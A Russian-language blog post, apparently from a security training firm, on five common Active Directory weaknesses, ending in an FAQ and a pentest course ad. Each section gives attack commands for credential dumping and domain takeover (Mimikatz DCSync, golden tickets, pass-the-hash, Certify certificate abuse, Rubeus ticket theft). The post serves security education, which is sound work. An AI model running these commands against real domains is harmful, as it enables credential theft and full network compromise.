Главная / Блог / Топ-5 уязвимостей Active Directory, которые мы находим почти в каждой компании
Знаете ли вы, что простая конфигурационная ошибка в Active Directory может стать входным билетом злоумышленника в вашу сеть? Такие уязвимости мы видим почти в каждой компании.
Active Directory (AD) — ключевая технология, на которой строится инфраструктура корпоративных сетей. Упрощая управление аутентификацией и доступами, AD зачастую становится лакомым куском для злоумышленников.
В этом материале мы собрали пять самых распространенных уязвимостей Active Directory, используемых на практике — от атак с Golden Ticket до DCSync. Вы узнаете, как они работают, что делают хакеры на следующем шаге и как этого избежать.
Злоумышленник получает доступ к хэшу пароля учетной записи KRBTGT — системного сервиса, выдающего Kerberos-билеты. Используя этот хэш, он создает «золотой билет», дающий полный доступ к домену без проверки сервером.
Что делает атакующий дальше?
Как это выглядит на практике:
В 2023 году банк в Восточной Европе потерял контроль над своей сетью. После компрометации KRBTGT злоумышленники
мигрировали данные клиентов в течение нескольких дней, оставаясь незаметными.
# Извлекаем хэш KRBTGT с помощью Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:krbtgt"'
# Создаем "золотой билет"
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:a9b3c... /ticket:golden.kirbi"'
Служба AD CS, используемая для управления цифровыми сертификатами, может содержать уязвимые шаблоны. Эти шаблоны позволяют злоумышленнику успешно пройти аутентификацию, получив права администратора через сертификат.
Что делает злоумышленник дальше?
Реальный кейс:
В 2024 году ритейлер потерял 2,5 ТБ данных клиентов из-за атаки на AD CS. Злоумышленники использовали слабые
настройки шаблонов для получения администраторских привилегий.
# Поиск уязвимых шаблонов
Certify.exe find /vulnerable
# Запрос сертификата для доменного админа
Certify.exe request /ca:ca.corp.local\corp-CA /template:VulnerableTemplate /altname:Administrator
Хэши паролей NTLM, находящиеся в памяти LSASS, позволяют атакующему аутентифицироваться без знания реального пароля.
Что делает хакер дальше?
Пример атаки из жизни:
На одном из проектов злоумышленник с помощью PtH распространился от обычного пользователя до уровня Domain Admin
менее чем за час.
# Дамп хэшей
sekurlsa::logonpasswords
# Используем хэш для доступа к серверу
sekurlsa::pth /user:Admin /domain:corp.local /ntlm:a9b3c... /run:"cmd.exe"
DCSync-атака позволяет злоумышленнику с правами Replicating Directory Changes выдавать себя за контроллер домена и запрашивать хэши паролей пользователей, включая администраторов.
Обычно затем атакующий делает следующее:
Кейс из практики:
В 2022 году группа киберпреступников проникла в инфраструктуру госучреждения и благодаря DCSync получила полный
доступ к сети.
# Выполняем DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:Administrator"'
Сервисы с Unconstrained Delegation хранят TGT-билеты других пользователей, включая администраторов. Если хакер получает доступ к такому серверу, он может использовать эти билеты для выполнения любого действия от имени атакуемого пользователя.
Следующие шаги:
Реальный пример:
Производитель ПО был атакован через SQL-сервер с включенной делегацией. Билеты администраторов использовались для
подключения к финансовым системам компании.
# Поиск серверов с Unconstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
# Кража TGT через SpoolService
Rubeus.exe monitor /interval:5 /filteruser:SERVER01$
Эти уязвимости подчеркивают, как легко атакующий может получить полномасштабный доступ через ошибки в конфигурации AD.
Ваши шаги:
Q: Как часто нужно проверять AD на уязвимости?
A: Минимум раз в квартал + после любых изменений в инфраструктуре.
Q: Какие инструменты использовать для проверки?
A: BloodHound, PingCastle, ADRecon.
Q: Можно ли полностью защититься от этих атак?
A: 100% защиты нет, но можно снизить риски на 90% через правильную конфигурацию.
Хотите научиться находить и использовать такие уязвимости в легальных пентестах? 29 мая стартует новый поток курса по тестированию AD от Codeby.
Все права защищены. © 2016 - 2025